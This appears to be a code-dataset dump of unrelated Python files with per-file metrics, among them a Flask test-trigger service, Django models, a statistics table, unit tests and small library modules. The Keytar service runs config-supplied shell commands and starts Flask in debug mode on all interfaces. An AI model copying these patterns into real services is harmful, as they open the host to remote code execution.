#!/usr/bin/env python # Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Keytar flask app. This program is responsible for exposing an interface to trigger cluster level tests. For instance, docker webhooks can be configured to point to this application in order to trigger tests upon pushing new docker images. """ import argparse import collections import datetime import json import logging import os import Queue import shutil import subprocess import tempfile import threading import yaml import flask app = flask.Flask(__name__) results = collections.OrderedDict() _TEMPLATE = ( 'python {directory}/test_runner.py -c "{config}" -t {timestamp} ' '-d {tempdir} -s {server}') class KeytarError(Exception): pass def run_test_config(config): """Runs a single test iteration from a configuration.""" tempdir = tempfile.mkdtemp() logging.info('Fetching github repository') # Get the github repo and clone it. github_config = config['github'] github_clone_args, github_repo_dir = _get_download_github_repo_args( tempdir, github_config) os.makedirs(github_repo_dir) subprocess.call(github_clone_args) current_dir = os.getcwd() timestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M') results[timestamp] = { 'timestamp': timestamp, 'status': 'Start', 'tests': {}, 'docker_image': config['docker_image'] } # Generate a test script with the steps described in the configuration, # as well as the command to execute the test_runner. 
with tempfile.NamedTemporaryFile(dir=tempdir, delete=False) as f: tempscript = f.name f.write('#!/bin/bash\n') if 'before_test' in config: # Change to the github repo directory, any steps to be run before the # tests should be executed from there. os.chdir(github_repo_dir) for before_step in config['before_test']: f.write('%s\n' % before_step) server = 'http://localhost:%d' % app.config['port'] f.write(_TEMPLATE.format( directory=current_dir, config=yaml.dump(config), timestamp=timestamp, tempdir=tempdir, server=server)) os.chmod(tempscript, 0775) try: subprocess.call([tempscript]) except subprocess.CalledProcessError as e: logging.warn('Error running test_runner: %s', str(e)) finally: os.chdir(current_dir) shutil.rmtree(tempdir) @app.route('/') def index(): return app.send_static_file('index.html') @app.route('/test_results') def test_results(): return json.dumps([results[x] for x in sorted(results)]) @app.route('/test_log') def test_log(): # Fetch the output from a test. log = '%s.log' % os.path.basename(flask.request.values['log_name']) return (flask.send_from_directory('/tmp/testlogs', log), 200, {'Content-Type': 'text/css'}) @app.route('/update_results', methods=['POST']) def update_results(): # Update the results dict, called from the test_runner. update_args = flask.request.get_json() timestamp = update_args['timestamp'] results[timestamp].update(update_args) return 'OK' def _validate_request(keytar_password, request_values): """Checks a request against the password provided to the service at startup. Raises an exception on errors, otherwise returns None. Args: keytar_password: password provided to the service at startup. request_values: dict of POST request values provided to Flask. Raises: KeytarError: raised if the password is invalid. 
""" if keytar_password: if 'password' not in request_values: raise KeytarError('Expected password not provided in test_request!') elif request_values['password'] != keytar_password: raise KeytarError('Incorrect password passed to test_request!') @app.route('/test_request', methods=['POST']) def test_request(): """Respond to a post request to execute tests. This expects a json payload containing the docker webhook information. If this app is configured to use a password, the password should be passed in as part of the POST request. Returns: HTML response. """ try: _validate_request(app.config['password'], flask.request.values) except KeytarError as e: flask.abort(400, str(e)) webhook_data = flask.request.get_json() repo_name = webhook_data['repository']['repo_name'] test_configs = [c for c in app.config['keytar_config']['config'] if c['docker_image'] == repo_name] if not test_configs: return 'No config found for repo_name: %s' % repo_name for test_config in test_configs: test_worker.add_test(test_config) return 'OK' def handle_cluster_setup(cluster_setup): """Setups up a cluster. Currently only GKE is supported. This step handles setting up credentials and ensuring a valid project name is used. Args: cluster_setup: YAML cluster configuration. Raises: KeytarError: raised on invalid setup configurations. """ if cluster_setup['type'] != 'gke': return if 'keyfile' not in cluster_setup: raise KeytarError('No keyfile found in GKE cluster setup!') # Add authentication steps to allow keytar to start clusters on GKE. gcloud_args = ['gcloud', 'auth', 'activate-service-account', '--key-file', cluster_setup['keyfile']] logging.info('authenticating using keyfile: %s', cluster_setup['keyfile']) subprocess.call(gcloud_args) os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = cluster_setup['keyfile'] # Ensure that a project name is correctly set. Use the name if provided # in the configuration, otherwise use the current project name, or else # the first available project name. 
if 'project_name' in cluster_setup: logging.info('Setting gcloud project to %s', cluster_setup['project_name']) subprocess.call( ['gcloud', 'config', 'set', 'project', cluster_setup['project_name']]) else: config = subprocess.check_output( ['gcloud', 'config', 'list', '--format', 'json']) project_name = json.loads(config)['core']['project'] if not project_name: projects = subprocess.check_output(['gcloud', 'projects', 'list']) first_project = projects[0]['projectId'] logging.info('gcloud project is unset, setting it to %s', first_project) subprocess.check_output( ['gcloud', 'config', 'set', 'project', first_project]) def handle_install_steps(keytar_config): """Runs all config installation/setup steps. Args: keytar_config: YAML keytar configuration. """ if 'install' not in keytar_config: return install_config = keytar_config['install'] for cluster_setup in install_config.get('cluster_setup', []): handle_cluster_setup(cluster_setup) # Install any dependencies using apt-get. if 'dependencies' in install_config: subprocess.call(['apt-get', 'update']) os.environ['DEBIAN_FRONTEND'] = 'noninteractive' for dep in install_config['dependencies']: subprocess.call( ['apt-get', 'install', '-y', '--no-install-recommends', dep]) # Run any additional commands if provided. for step in install_config.get('extra', []): os.system(step) # Update path environment variable. for path in install_config.get('path', []): os.environ['PATH'] = '%s:%s' % (path, os.environ['PATH']) def _get_download_github_repo_args(tempdir, github_config): """Get arguments for github actions. Args: tempdir: Base directory to git clone into. github_config: Configuration describing the repo, branches, etc. Returns: ([string], string) for arguments to pass to git, and the directory to clone into. 
""" repo_prefix = github_config.get('repo_prefix', 'github') repo_dir = os.path.join(tempdir, repo_prefix) git_args = ['git', 'clone', 'https://github.com/%s' % github_config['repo'], repo_dir] if 'branch' in github_config: git_args += ['-b', github_config['branch']] return git_args, repo_dir class TestWorker(object): """A simple test queue. HTTP requests append to this work queue.""" def __init__(self): self.test_queue = Queue.Queue() self.worker_thread = threading.Thread(target=self.worker_loop) self.worker_thread.daemon = True def worker_loop(self): # Run forever, executing tests as they are added to the queue. while True: item = self.test_queue.get() run_test_config(item) self.test_queue.task_done() def start(self): self.worker_thread.start() def add_test(self, config): self.test_queue.put(config) test_worker = TestWorker() def main(): logging.getLogger().setLevel(logging.INFO) parser = argparse.ArgumentParser(description='Run keytar') parser.add_argument('--config_file', help='Keytar config file', required=True) parser.add_argument('--password', help='Password', default=None) parser.add_argument('--port', help='Port', default=8080, type=int) keytar_args = parser.parse_args() with open(keytar_args.config_file, 'r') as yaml_file: yaml_config = yaml_file.read() if not yaml_config: raise ValueError('No valid yaml config!') keytar_config = yaml.load(yaml_config) handle_install_steps(keytar_config) if not os.path.isdir('/tmp/testlogs'): os.mkdir('/tmp/testlogs') test_worker.start() app.config['port'] = keytar_args.port app.config['password'] = keytar_args.password app.config['keytar_config'] = keytar_config app.run(host='0.0.0.0', port=keytar_args.port, debug=True) if __name__ == '__main__': main()
31.625397
80
0.709797
1,356
9,962
5.066372
0.275811
0.027948
0.0131
0.01179
0.050655
0.023581
0.023581
0.012809
0
0
0
0.003279
0.173459
9,962
314
81
31.726115
0.831066
0.133808
0
0.044944
0
0
0.195724
0.01478
0
0
0
0
0
0
null
null
0.05618
0.073034
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
2
e5b90a3554ab06af73ddd302f4a2c603dc55c402
894
py
Python
pytedee/pytedee/example.py
konradsikorski/pytedee
02b7a39b46af3887e933c3d4454d0986a5277bbb
[ "MIT" ]
4
2021-01-05T23:39:07.000Z
2021-11-18T12:51:50.000Z
pytedee/pytedee/example.py
konradsikorski/pytedee
02b7a39b46af3887e933c3d4454d0986a5277bbb
[ "MIT" ]
3
2020-11-28T14:02:32.000Z
2022-02-02T22:08:37.000Z
pytedee/pytedee/example.py
konradsikorski/pytedee
02b7a39b46af3887e933c3d4454d0986a5277bbb
[ "MIT" ]
7
2020-11-25T21:22:14.000Z
2022-03-31T19:52:14.000Z
''' Created on 01.11.2020 @author: joerg ''' import time from pytedee.TedeeClient import TedeeClient from pytedee.Lock import Lock from pytedee.TedeeClientException import TedeeClientException '''Tedee Credentials''' username = "username" password = "password" client = TedeeClient(username, password) print ("Token: " + str(client._token)) print ("Token valid: " + str(client._token_valid_until)) locks = client.get_locks() for lock in locks: print("----------------------------------------------") print("Lock name: " + lock.get_name()) print("Lock id: " + str(lock.get_id())) print("Lock Battery: " + str(lock.get_battery_level())) client.get_state() print("Is Locked: " + str(client.is_locked(lock.get_id()))) print("Is Unlocked: " + str(client.is_unlocked(lock.get_id()))) # client.unlock(lock.get_id()) # time.sleep(3) # client.open(lock.get_id())
29.8
67
0.657718
113
894
5.061947
0.353982
0.085664
0.078671
0.048951
0
0
0
0
0
0
0
0.011688
0.138702
894
29
68
30.827586
0.731169
0.130872
0
0
0
0
0.188172
0.061828
0
0
0
0
0
1
0
false
0.111111
0.222222
0
0.222222
0.444444
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
1
0
2
e5c7c4046de95a16522016b26af1724d48486862
3,498
py
Python
backend_app/users/models.py
shakil2995/IUB-Help-Desk-System
2bf6deb1dbd4f84c784894f69db4dfa971fb65dd
[ "Apache-2.0" ]
1
2021-11-17T14:03:42.000Z
2021-11-17T14:03:42.000Z
backend_app/users/models.py
shakil2995/IUB-Help-Desk-System
2bf6deb1dbd4f84c784894f69db4dfa971fb65dd
[ "Apache-2.0" ]
null
null
null
backend_app/users/models.py
shakil2995/IUB-Help-Desk-System
2bf6deb1dbd4f84c784894f69db4dfa971fb65dd
[ "Apache-2.0" ]
null
null
null
import uuid from django.db import models from django.contrib.auth.base_user import BaseUserManager from django.contrib.auth.models import AbstractBaseUser from django.utils import timezone from .modelchioce import PRIORITY_CHOICE, RESOLVE_CHOICE, USER_TYPE_CHOICE today = timezone.now class CustomUserManager(BaseUserManager): def create_user(self, email, password=None): if not email: raise ValueError('Users must have an email address') user = self.model( email=self.normalize_email(email), ) user.set_password(password) user.save(using=self._db) return user def create_superuser(self, email, password): user = self.create_user( email, password=password, ) user.is_staff = True user.is_admin = True user.is_superuser = True user.save(using=self._db) return user class CustomUser(AbstractBaseUser): name = models.CharField(max_length=255, blank=True) email = models.EmailField(unique=True, max_length=255) mobile = models.CharField(max_length=255, blank=True) password = models.CharField(max_length=255) is_active = models.BooleanField(default=True) is_staff = models.BooleanField(default=False) is_admin = models.BooleanField(default=False) is_superuser = models.BooleanField(default=False) created_date = models.DateTimeField(auto_now_add=True) updated_date = models.DateTimeField(auto_now=True) user_type = models.CharField(choices=USER_TYPE_CHOICE,max_length=255,default='admin') USERNAME_FIELD = 'email' REQUIRED_FIELDS = [] objects = CustomUserManager() def has_perm(self, perm, obj=None): return self.is_superuser def has_module_perms(self, app_label): return self.is_superuser def __str__(self): return str(self.email) class TokenAuth(models.Model): account = models.ForeignKey(CustomUser, on_delete=models.CASCADE) is_validated = models.BooleanField(default=False) logged_in = models.BooleanField(default=False) refresh_token = models.TextField() created_date = models.DateTimeField(auto_now_add=True) updated_date = models.DateTimeField(auto_now=True) def __str__(self): return 
self.account # class Permission(models.Model): # user = models.ForeignKey(CustomUser,on_delete=models.PROTECT) # permission_name = models.TextField() # price = models.DecimalField(max_digits=6, decimal_places=2) # created_date = models.DateTimeField(auto_now_add=True) # updated_date = models.DateTimeField(auto_now=True) class Ticket(models.Model): title = models.CharField(max_length=255,default="") description = models.TextField(default="") initiator = models.ForeignKey(CustomUser, on_delete=models.CASCADE,related_name='who_raise_ticket') assigne = models.ForeignKey(CustomUser, on_delete=models.CASCADE,null=True,blank=True,related_name='assigne_for_ticket') priority = models.CharField(choices=PRIORITY_CHOICE,max_length=50,default='medium') request_type = models.CharField(max_length=50,default='',null=True) resolve_status = models.CharField(choices=RESOLVE_CHOICE,max_length=50,default='open',null=True) created_date = models.DateTimeField(auto_now_add=True) updated_date = models.DateTimeField(auto_now=True) updated_by = models.ForeignKey(CustomUser, on_delete=models.CASCADE,null=True,blank=True,related_name='updated_by')
37.212766
124
0.731561
434
3,498
5.686636
0.274194
0.03282
0.074554
0.08752
0.39222
0.305511
0.289303
0.198541
0.198541
0.198541
0
0.008947
0.16924
3,498
93
125
37.612903
0.84033
0.090337
0
0.205882
0
0
0.030246
0
0
0
0
0
0
1
0.088235
false
0.073529
0.088235
0.058824
0.764706
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
e5ce5bfbe9bc862706ab6922b4a70515ff0c41e6
3,480
py
Python
common/NormalTable.py
hanhui666888/AIStudy
57d8cd4c0bb6accdc409f5518ade51f4d8c66596
[ "Apache-2.0" ]
null
null
null
common/NormalTable.py
hanhui666888/AIStudy
57d8cd4c0bb6accdc409f5518ade51f4d8c66596
[ "Apache-2.0" ]
null
null
null
common/NormalTable.py
hanhui666888/AIStudy
57d8cd4c0bb6accdc409f5518ade51f4d8c66596
[ "Apache-2.0" ]
null
null
null
import numpy as np import math import random as rd normalTable = [0.5000,0.5040,0.5080,0.5120,0.5160,0.5199,0.5239,0.5279,0.5319,0.5359, 0.5398,0.5438,0.5478,0.5517,0.5557,0.5596,0.5636,0.5675,0.5714,0.5753, 0.5793,0.5832,0.5871,0.5910,0.5948,0.5987,0.6026,0.6064,0.6103,0.6141, 0.6179,0.6217,0.6255,0.6293,0.6331,0.6368,0.6406,0.6443,0.6480,0.6517, 0.6554,0.6591,0.6628,0.6664,0.6700,0.6736,0.6772,0.6808,0.6844,0.6879, 0.6915,0.6950,0.6985,0.7019,0.7054,0.7088,0.7123,0.7157,0.7190,0.7224, 0.7257,0.7291,0.7324,0.7357,0.7389,0.7422,0.7454,0.7486,0.7517,0.7549, 0.7580,0.7611,0.7642,0.7673,0.7704,0.7734,0.7764,0.7794,0.7823,0.7852, 0.7881,0.7910,0.7939,0.7967,0.7995,0.8023,0.8051,0.8078,0.8106,0.8133, 0.8159,0.8186,0.8212,0.8238,0.8264,0.8289,0.8315,0.8340,0.8365,0.8389, 0.8413,0.8438,0.8461,0.8485,0.8508,0.8531,0.8554,0.8577,0.8599,0.8621, 0.8643,0.8665,0.8686,0.8708,0.8729,0.8749,0.8770,0.8790,0.8810,0.8830, 0.8849,0.8869,0.8888,0.8907,0.8925,0.8944,0.8962,0.8980,0.8997,0.9015, 0.9032,0.9049,0.9066,0.9082,0.9099,0.9115,0.9131,0.9147,0.9162,0.9177, 0.9192,0.9207,0.9222,0.9236,0.9251,0.9265,0.9279,0.9292,0.9306,0.9319, 0.9332,0.9345,0.9357,0.9370,0.9382,0.9394,0.9406,0.9418,0.9429,0.9441, 0.9452,0.9463,0.9474,0.9484,0.9495,0.9505,0.9515,0.9525,0.9535,0.9545, 0.9554,0.9564,0.9573,0.9582,0.9591,0.9599,0.9608,0.9616,0.9625,0.9633, 0.9641,0.9649,0.9656,0.9664,0.9671,0.9678,0.9686,0.9693,0.9699,0.9706, 0.9713,0.9719,0.9726,0.9732,0.9738,0.9744,0.9750,0.9756,0.9761,0.9767, 0.9772,0.9778,0.9783,0.9788,0.9793,0.9798,0.9803,0.9808,0.9812,0.9817, 0.9821,0.9826,0.9830,0.9834,0.9838,0.9842,0.9846,0.9850,0.9854,0.9857, 0.9861,0.9864,0.9868,0.9871,0.9875,0.9878,0.9881,0.9884,0.9887,0.9890, 0.9893,0.9896,0.9898,0.9901,0.9904,0.9906,0.9909,0.9911,0.9913,0.9916, 0.9918,0.9920,0.9922,0.9925,0.9927,0.9929,0.9931,0.9932,0.9934,0.9936, 0.9938,0.9940,0.9941,0.9943,0.9945,0.9946,0.9948,0.9949,0.9951,0.9952, 0.9953,0.9955,0.9956,0.9957,0.9959,0.9960,0.9961,0.9962,0.9963,0.9964, 
0.9965,0.9966,0.9967,0.9968,0.9969,0.9970,0.9971,0.9972,0.9973,0.9974, 0.9974,0.9975,0.9976,0.9977,0.9977,0.9978,0.9979,0.9979,0.9980,0.9981, 0.9981,0.9982,0.9982,0.9983,0.9984,0.9984,0.9985,0.9985,0.9986,0.9986, 0.9987,0.9987,0.9987,0.9988,0.9988,0.9989,0.9989,0.9989,0.9990,0.9990, 0.9990,0.9991,0.9991,0.9991,0.9992,0.9992,0.9992,0.9992,0.9993,0.9993, 0.9993,0.9993,0.9994,0.9994,0.9994,0.9994,0.9994,0.9995,0.9995,0.9995, 0.9995,0.9995,0.9995,0.9996,0.9996,0.9996,0.9996,0.9996,0.9996,0.9996, 0.9997,0.9997,0.9997,0.9997,0.9997,0.9997,0.9997,0.9997,0.9997,0.9998] def getValueByProbability(probability): for i in range(len(normalTable)): if normalTable[i] >= probability: return i/100 else: return -1 def sigmod(x): return 1 / (math.exp(-x) + 1) def f(x): return math.exp(x**2 /(-2))/math.sqrt(2 * math.pi) def tanh(x): a = math.exp(x) b = math.exp( -x) return (a-b)/(a+b) def tanhd(x): return (1-tanh(x)**2)*f(x)*x
56.129032
85
0.583621
780
3,480
2.603846
0.432051
0.022157
0.026588
0.039389
0.116691
0.086657
0.086657
0.066962
0.066962
0.054653
0
0.626467
0.192241
3,480
61
86
57.04918
0.096051
0
0
0
0
0
0
0
0
0
0
0
0
1
0.092593
false
0
0.055556
0.055556
0.259259
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e5ceb9c9097d4a471d8420c4497b1a4b646396ed
1,493
py
Python
objax/functional/parallel.py
kihyuks/objax
101907799e64c0d8160febf84a341d4d386bff51
[ "Apache-2.0" ]
715
2020-08-20T07:23:03.000Z
2022-03-31T18:17:54.000Z
objax/functional/parallel.py
kihyuks/objax
101907799e64c0d8160febf84a341d4d386bff51
[ "Apache-2.0" ]
145
2020-08-21T07:42:36.000Z
2022-03-18T16:51:37.000Z
objax/functional/parallel.py
kihyuks/objax
101907799e64c0d8160febf84a341d4d386bff51
[ "Apache-2.0" ]
59
2020-08-20T07:30:53.000Z
2022-01-05T23:00:06.000Z
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. __all__ = ['partial', 'pmax', 'pmean', 'pmin', 'psum'] from functools import partial import jax from jax import lax def pmax(x: jax.interpreters.pxla.ShardedDeviceArray, axis_name: str = 'device'): """Compute a multi-device reduce max on x over the device axis axis_name.""" return lax.pmax(x, axis_name) def pmean(x: jax.interpreters.pxla.ShardedDeviceArray, axis_name: str = 'device'): """Compute a multi-device reduce mean on x over the device axis axis_name.""" return lax.pmean(x, axis_name) def pmin(x: jax.interpreters.pxla.ShardedDeviceArray, axis_name: str = 'device'): """Compute a multi-device reduce min on x over the device axis axis_name.""" return lax.pmin(x, axis_name) def psum(x: jax.interpreters.pxla.ShardedDeviceArray, axis_name: str = 'device'): """Compute a multi-device reduce sum on x over the device axis axis_name.""" return lax.psum(x, axis_name)
36.414634
82
0.734092
230
1,493
4.695652
0.4
0.088889
0.059259
0.074074
0.433333
0.433333
0.433333
0.433333
0.433333
0.433333
0
0.006421
0.165439
1,493
40
83
37.325
0.860353
0.558607
0
0
0
0
0.076677
0
0
0
0
0
0
1
0.333333
false
0
0.25
0
0.916667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
e5d69e1b59d1ee8b1c553f23fc3db8e2a79cac4c
427
py
Python
rbfmorph/__init__.py
utkarshmech/rbfmorph
7f5a96ea990dd3da59d4daa0546d365340c5c7fd
[ "MIT" ]
2
2021-07-08T09:25:29.000Z
2022-03-25T02:57:17.000Z
rbfmorph/__init__.py
utkarshmech/rbfmorph
7f5a96ea990dd3da59d4daa0546d365340c5c7fd
[ "MIT" ]
null
null
null
rbfmorph/__init__.py
utkarshmech/rbfmorph
7f5a96ea990dd3da59d4daa0546d365340c5c7fd
[ "MIT" ]
1
2021-08-31T13:02:28.000Z
2021-08-31T13:02:28.000Z
""" rbfmorph init file """ from .fem_disp import * from .input import * from .coordinates import * from .import_msh import * from .rbf_func import * from .solve import * from .vtk_export import * from .new_coor import * __project__ = 'rbfmorph' __title__ = "rbfmorph" __author__ = "Utkarsh Thakre" __license__ = "MIT" __version__ = "0.0.1" __mail__ = '17d100018@iitb.ac.in' __maintainer__ = __author__ __status__ = "breaking"
20.333333
33
0.737705
54
427
5.074074
0.648148
0.255474
0
0
0
0
0
0
0
0
0
0.03022
0.147541
427
20
34
21.35
0.722527
0.042155
0
0
0
0
0.164589
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
e5dbf5c62b02a11a9f5a3a4f6ad79c8e6ea354e7
1,615
py
Python
sciope/utilities/summarystats/summary_base.py
rmjiang7/sciope
5122107dedcee9c39458e83d853ec35f91268780
[ "Apache-2.0" ]
5
2019-05-21T18:56:04.000Z
2020-08-02T20:09:43.000Z
sciope/utilities/summarystats/summary_base.py
rmjiang7/sciope
5122107dedcee9c39458e83d853ec35f91268780
[ "Apache-2.0" ]
6
2020-10-16T08:11:10.000Z
2022-03-16T09:35:46.000Z
sciope/utilities/summarystats/summary_base.py
rmjiang7/sciope
5122107dedcee9c39458e83d853ec35f91268780
[ "Apache-2.0" ]
6
2019-05-23T09:09:00.000Z
2020-08-02T20:09:45.000Z
# Copyright 2017 Prashant Singh, Fredrik Wrede and Andreas Hellander # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Base Class for Summary Statistics """ # Imports from abc import ABCMeta, abstractmethod # Class definition class SummaryBase(object): """ Base class for summary statistics. """ __metaclass__ = ABCMeta def __init__(self, name, mean_trajectories=False, use_logger=False): """ Set up local variables :param name: unique identifier for the statistic :param mean_trajectories: if enabled, it returns the mean statistic value computed over all trajectories :param use_logger: if enabled, logs the summary statistic calculation in a file and on screen """ self.name = name self.summaries_names = None self.mean_trajectories = mean_trajectories self.use_logger = use_logger def compute(self, data): """ Calculate the summary statistic value for given 'data' :param data: a fixed data set or simulation result :return: the computed summary statistic value """
34.361702
112
0.709598
214
1,615
5.275701
0.556075
0.053144
0.023029
0.028344
0.051373
0
0
0
0
0
0
0.0064
0.226006
1,615
46
113
35.108696
0.8968
0.682353
0
0
0
0
0
0
0
0
0
0
0
1
0.222222
false
0
0.111111
0
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
e5e0d12a9e36fc5f92b96a631ff6de1286ac2249
1,566
py
Python
application/mod_collage/col_controllers.py
hieusydo/Voyage
2a98118131fad927326d318ae1766e64bbb5add8
[ "MIT" ]
1
2018-04-23T05:16:49.000Z
2018-04-23T05:16:49.000Z
application/mod_collage/col_controllers.py
hieusydo/Voyage
2a98118131fad927326d318ae1766e64bbb5add8
[ "MIT" ]
null
null
null
application/mod_collage/col_controllers.py
hieusydo/Voyage
2a98118131fad927326d318ae1766e64bbb5add8
[ "MIT" ]
null
null
null
from flask import Blueprint, render_template, session, redirect, url_for from flask_wtf import FlaskForm from wtforms import SelectField from application.mod_collage.photoManip import generateCollage from application.mod_auth.models import Landmark mod_collage = Blueprint('collage', __name__, url_prefix='/collage') # Represents the collage form class AddColForm(FlaskForm): landmark1 = SelectField("Landmark 1") landmark2 = SelectField("Landmark 2") # Allows setting the 'choices' field after creation def setChoices(self, landmarks): self.landmark1.choices = landmarks self.landmark2.choices = landmarks @mod_collage.route('/get/', methods=['GET', 'POST']) def picTest(): if 'user_id' not in session: return redirect(url_for('auth.signin')) # Get landmarks by id uid = session['user_id'] landmarks = Landmark.query.filter_by(usrID=uid).all() landmarks.sort(key=lambda x: x.lmName) print "picTest", landmarks # Create a list of value,display tuples from the landmarks choices = [] for i in landmarks: choices.append((i.photoFileURL, i.lmName)) # Create and set the form choices form = AddColForm() form.setChoices(choices) if form.validate_on_submit(): print "picTest about to generateCollage..." url = generateCollage(form.landmark1.data, form.landmark2.data) print "picTest done generateCollage" return render_template('collage/result.html', image_url=url) return render_template('collage/request.html', form=form)
32.625
72
0.716475
193
1,566
5.704663
0.466321
0.038147
0.025431
0.049046
0
0
0
0
0
0
0
0.00626
0.183908
1,566
48
73
32.625
0.855243
0.118774
0
0
1
0
0.131636
0
0
0
0
0
0
0
null
null
0
0.16129
null
null
0.16129
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
e5ebc328612496ae631b2fd37b4868aa23e5ec05
2,229
py
Python
test/test.py
kiziebar/pycom
947eb5ebda18cd40cc2478171411846b6bb3360b
[ "MIT" ]
null
null
null
test/test.py
kiziebar/pycom
947eb5ebda18cd40cc2478171411846b6bb3360b
[ "MIT" ]
null
null
null
test/test.py
kiziebar/pycom
947eb5ebda18cd40cc2478171411846b6bb3360b
[ "MIT" ]
null
null
null
import unittest

import numpy as np

from pycom import Comet


class TestComet(unittest.TestCase):
    """Error paths of the Comet constructor and its public methods."""

    def test_criteriaFail(self):
        """A criterion containing a non-numeric entry raises TypeError."""
        with self.assertRaises(TypeError):
            Comet(["Bad", 0.5, 1])

    def test_criteriaType(self):
        """Criteria given as a tuple (not a list) raise TypeError."""
        with self.assertRaises(TypeError):
            Comet((0, 0.5, 1))

    def test_lackOfCriteria(self):
        """An empty criteria list raises ValueError."""
        with self.assertRaises(ValueError):
            Comet([])

    def test_noCoInRateCo(self):
        """rate_co() before generate_co() raises ValueError."""
        with self.assertRaises(ValueError):
            comet = Comet([[2, 3]])
            comet.rate_co()

    def test_preferenceMejFail(self):
        """rate_co('mej') is rejected for this setup with ValueError."""
        with self.assertRaises(ValueError):
            comet = Comet([[0, 1]])
            comet.generate_co()
            comet.rate_co('mej')

    def test_preferenceValueFail(self):
        """rate_co(value=8) is rejected with ValueError."""
        with self.assertRaises(ValueError):
            comet = Comet([[0, 1]])
            comet.generate_co()
            comet.rate_co(value=8)

    def test_preferenceOptionFail(self):
        """An unknown preference option raises ValueError."""
        with self.assertRaises(ValueError):
            comet = Comet([[0, 1]])
            comet.generate_co()
            comet.rate_co('bad')

    def test_noCoInRate(self):
        """rate() before generate_co() raises ValueError."""
        with self.assertRaises(ValueError):
            comet = Comet([[2, 3]])
            comet.rate(np.asarray([[0.2, 0.3]]))

    def test_noCoInChangePreferenceCo(self):
        """change_co_preference() before generate_co() raises ValueError."""
        with self.assertRaises(ValueError):
            comet = Comet([[2, 3]])
            comet.change_co_preference([0.1, 0.2])

    def test_highPreferenceValue(self):
        """A preference value above 1 raises ValueError."""
        with self.assertRaises(ValueError):
            comet = Comet([[2, 3]])
            comet.generate_co()
            comet.change_co_preference([0.1, 2])

    def test_lowPreferenceValue(self):
        """A negative preference value raises ValueError."""
        with self.assertRaises(ValueError):
            comet = Comet([[2, 3]])
            comet.generate_co()
            comet.change_co_preference([0.1, -1])

    def test_alternativesLen(self):
        """An alternative row of the wrong width raises ValueError."""
        with self.assertRaises(ValueError):
            comet = Comet([[2, 3], [2, 3, 4]])
            comet.generate_co()
            comet.rate(np.array([[1, 2, 3]]))

    def test_alternativesValue(self):
        """These alternative values are rejected with ValueError."""
        with self.assertRaises(ValueError):
            comet = Comet([[1, 2], [2, 5, 8]])
            comet.generate_co()
            comet.rate(np.array([[4, 20], [2, -1]]))
29.328947
50
0.559892
257
2,229
4.7393
0.194553
0.074713
0.128079
0.256158
0.654351
0.610016
0.531199
0.452381
0.452381
0.416256
0
0.036013
0.302378
2,229
76
50
29.328947
0.747267
0
0
0.466667
0
0
0.004036
0
0
0
0
0
0.216667
1
0.216667
false
0
0.05
0
0.283333
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
2
f90b203ec4c7e85f01d14f890abe264c1e434796
1,716
py
Python
Code/coupon_collector.py
PacktPublishing/Modern-Python-Cookbook
40ff656c64421ddf6c288e058bb99a929f6d4c39
[ "MIT" ]
107
2016-11-30T02:13:39.000Z
2022-03-31T06:38:59.000Z
Code/coupon_collector.py
fengfanzhiwu/Modern-Python-Cookbook
8eff962f6eae514d531beca9051aefa34941ef4d
[ "MIT" ]
2
2017-04-19T04:08:21.000Z
2019-03-09T16:18:33.000Z
Code/coupon_collector.py
fengfanzhiwu/Modern-Python-Cookbook
8eff962f6eae514d531beca9051aefa34941ef4d
[ "MIT" ]
71
2017-01-16T06:35:17.000Z
2022-03-01T21:25:54.000Z
